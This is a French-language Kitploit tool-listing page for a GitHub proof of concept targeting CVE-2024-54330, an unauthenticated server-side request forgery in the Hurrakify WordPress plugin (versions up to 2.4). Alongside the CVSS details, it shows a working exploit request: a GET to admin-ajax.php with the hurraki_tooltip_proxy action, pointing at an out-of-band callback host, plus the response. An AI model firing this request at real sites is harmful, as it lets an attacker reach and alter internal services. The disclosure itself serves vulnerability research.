Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-54330 — Hurrakify <= 2.4 - Falsification de requête côté serveur non authentifiée | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-54330
ReconnaissanceAnalyse des VulnérabilitésExploitation d'Applications WebSécurité Web
GitHubrandomrobbiebf/cve-2024-54330

CVE-2024-54330

Hurrakify <= 2.4 - Falsification de requête côté serveur non authentifiée

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-54330

Hurrakify <= 2.4 - Falsification de requête côté serveur non authentifiée

Description

Le plugin Hurrakify pour WordPress présente une vulnérabilité de falsification de requête côté serveur dans toutes les versions jusqu'à la 2.4 incluse. Cela permet à des attaquants non authentifiés d'envoyer des requêtes web vers des emplacements arbitraires à partir de l'application web, ce qui peut servir à interroger et à modifier des informations de services internes.

Détails

  • Type : plugin
  • Slug : hurrakify
  • Version concernée : 2.4
  • Score CVSS : 7.2
  • Gravité CVSS : Élevé
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE : CVE-2024-54330
  • Statut : Actif

POC

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
root@kitploit:~
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>
Télécharger l’outil